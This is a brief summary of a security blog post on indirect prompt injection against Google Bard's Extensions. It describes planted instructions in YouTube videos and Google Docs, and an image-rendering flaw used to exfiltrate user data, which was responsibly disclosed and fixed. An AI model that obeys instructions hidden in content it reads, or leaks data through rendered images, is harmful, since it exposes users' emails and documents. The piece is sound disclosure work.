Google Bard recently received powerful updates, one of which includes Extensions. These Extensions allow Bard to access various features such as YouTube, flight and hotel searches, and even a user’s personal documents and emails, including Drive, Docs, and Gmail. However, this newfound access also opens up vulnerabilities to Indirect Prompt Injection. Prompt Injection has been tested successfully with older YouTube videos and Google Docs, revealing the potential for interesting exploits. Notably, there is a vulnerability in Google Bard that allows the rendering of images, which can be exploited for exfiltration of data. A demonstration and responsible disclosure were made to Google, who subsequently fixed the issue.
https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/